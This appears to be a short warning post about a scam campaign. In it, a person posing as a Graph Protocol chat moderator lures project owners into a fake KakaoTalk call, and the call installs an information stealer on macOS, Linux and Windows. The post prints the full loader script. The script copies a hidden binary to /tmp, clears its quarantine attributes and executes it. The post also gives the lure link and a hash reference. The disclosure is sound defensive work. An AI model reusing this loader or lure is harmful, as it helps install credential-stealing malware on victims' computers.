Another distribution campaign.

@evabeylin (#5817609036) (stated as moderator/admin of the Graph Protocol chat group), is looking out for projects that need investment.
She enters dialog, communicates, invites for a call using the link http://kakao.us.com/?join=4AT3IL (now the link leads to https://jprs.co.jp/en/).

You can download an app for the call on the page.
For OSX it is a DMG file with a size of 742KB.

Inside will be a shell script that you are asked to drag and drop into terminal.
It will cause the stealer to be installed.

Loader is:

#!/bin/bash
osascript -e 'on run
    try
        set diskList to list disks
    end try
    set targetDisk to ""
    try
        repeat with disk in diskList
            if disk contains "KakaoTalk" then
                set targetDisk to disk
                exit repeat
            end if
        end repeat
    end try
    if targetDisk is "" then
        return
    end if
    set folderPath to "/Volumes/" & targetDisk & "/"
    set appName to ".KakaoTalk"
    set appPath to folderPath & appName
    set tempAppPath to "/tmp/" & appName
    try
        do shell script "rm -f " & quoted form of tempAppPath
    end try
    try
        do shell script "cp " & quoted form of appPath & " " & quoted form of tempAppPath
    end try
    try
        do shell script "xattr -c " & quoted form of tempAppPath
    end try
    try
        do shell script "chmod +x " & quoted form of tempAppPath
    end try
    try
        do shell script quoted form of tempAppPath
    end try
end run'

Stealer on virustotal: https://www.virustotal.com/gui/file/76702b651e19ab338d0a877e84fcec950c022f5c892e77f9c6e7dbd45a6fae0e
They also targeted Linux and Windows.

Stranger, be careful, having a contact in admin status in some groups does not guarantee security.

Up: graph protocol just removed mention about @evabeylin from posts